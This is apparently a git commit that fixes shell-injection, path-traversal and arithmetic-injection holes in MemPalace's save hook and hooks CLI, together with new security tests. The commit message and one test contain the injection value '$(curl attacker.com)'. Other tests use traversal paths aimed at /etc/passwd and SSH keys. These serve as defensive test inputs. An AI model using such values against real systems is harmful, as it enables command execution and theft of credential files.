fix: harden hooks against shell injection, path traversal, and arithmetic injection

save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809
2026-04-13 14:10:04 -03:00
parent b060171c59
commit 0f217f7c80
3 changed files with 96 additions and 6 deletions
@@ -65,15 +65,18 @@ MEMPAL_DIR=""
 INPUT=$(cat)

 # Parse all fields in a single Python call (3x faster than separate invocations)
+# SECURITY: All values are sanitized before being interpolated into shell assignments.
+# stop_hook_active is coerced to a strict True/False to prevent command injection via eval.
 eval $(echo "$INPUT" | python3 -c "
-import sys, json
+import sys, json, re
 data = json.load(sys.stdin)
 sid = data.get('session_id', 'unknown')
-sha = data.get('stop_hook_active', False)
+sha_raw = data.get('stop_hook_active', False)
 tp = data.get('transcript_path', '')
 # Shell-safe output — only allow alphanumeric, underscore, hyphen, slash, dot, tilde
-import re
 safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
+# Coerce stop_hook_active to strict boolean string
+sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1', 'yes') else 'False'
 print(f'SESSION_ID=\"{safe(sid)}\"')
 print(f'STOP_HOOK_ACTIVE=\"{sha}\"')
 print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
@@ -118,7 +121,11 @@ fi
 LAST_SAVE_FILE="$STATE_DIR/${SESSION_ID}_last_save"
 LAST_SAVE=0
 if [ -f "$LAST_SAVE_FILE" ]; then
-    LAST_SAVE=$(cat "$LAST_SAVE_FILE")
+    LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE")
+    # SECURITY: Validate as plain integer before arithmetic to prevent command injection
+    if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
+        LAST_SAVE="$LAST_SAVE_RAW"
+    fi
 fi

 SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
@@ -43,10 +43,29 @@ def _sanitize_session_id(session_id: str) -> str:
    return sanitized or "unknown"


+def _validate_transcript_path(transcript_path: str) -> Path:
+    """Validate and resolve a transcript path, rejecting paths outside expected roots.
+
+    Returns a resolved Path if valid, or None if the path should be rejected.
+    Accepted paths must:
+    - Have a .jsonl or .json extension
+    - Not contain '..' after resolution (path traversal prevention)
+    """
+    if not transcript_path:
+        return None
+    path = Path(transcript_path).expanduser().resolve()
+    if path.suffix not in (".jsonl", ".json"):
+        return None
+    # Reject if the original input contained '..' traversal components
+    if ".." in Path(transcript_path).parts:
+        return None
+    return path
+
+
 def _count_human_messages(transcript_path: str) -> int:
    """Count human messages in a JSONL transcript, skipping command-messages."""
-    path = Path(transcript_path).expanduser()
-    if not path.is_file():
+    path = _validate_transcript_path(transcript_path)
+    if path is None or not path.is_file():
        return 0
    count = 0
    try:
@@ -15,6 +15,7 @@ from mempalace.hooks_cli import (
    _maybe_auto_ingest,
    _parse_harness_input,
    _sanitize_session_id,
+    _validate_transcript_path,
    hook_stop,
    hook_session_start,
    hook_precompact,
@@ -418,3 +419,66 @@ def test_run_hook_invalid_json(tmp_path):
            with patch("mempalace.hooks_cli._output") as mock_output:
                run_hook("session-start", "claude-code")
    mock_output.assert_called_once_with({})
+
+
+# --- Security: transcript_path validation ---
+
+
+def test_validate_transcript_rejects_path_traversal():
+    """Paths with '..' components should be rejected."""
+    assert _validate_transcript_path("../../etc/passwd") is None
+    assert _validate_transcript_path("../../../.ssh/id_rsa") is None
+
+
+def test_validate_transcript_rejects_wrong_extension():
+    """Only .jsonl and .json extensions are accepted."""
+    assert _validate_transcript_path("/tmp/transcript.txt") is None
+    assert _validate_transcript_path("/tmp/secret.py") is None
+    assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None
+
+
+def test_validate_transcript_accepts_valid_paths(tmp_path):
+    """Valid .jsonl and .json paths should be accepted."""
+    jsonl_path = tmp_path / "session.jsonl"
+    jsonl_path.touch()
+    result = _validate_transcript_path(str(jsonl_path))
+    assert result is not None
+    assert result.suffix == ".jsonl"
+
+    json_path = tmp_path / "session.json"
+    json_path.touch()
+    result = _validate_transcript_path(str(json_path))
+    assert result is not None
+    assert result.suffix == ".json"
+
+
+def test_validate_transcript_empty_string():
+    """Empty transcript path should return None."""
+    assert _validate_transcript_path("") is None
+
+
+def test_count_rejects_traversal_path():
+    """_count_human_messages should return 0 for path traversal attempts."""
+    assert _count_human_messages("../../etc/passwd") == 0
+
+
+def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
+    """stop_hook_active with shell injection string should not cause issues."""
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
+    )
+    # Simulate a malicious stop_hook_active value
+    result = _capture_hook_output(
+        hook_stop,
+        {
+            "session_id": "test",
+            "stop_hook_active": "$(curl attacker.com)",
+            "transcript_path": str(transcript),
+        },
+        state_dir=tmp_path,
+    )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
+    # It should count messages and block at the interval
+    assert result["decision"] == "block"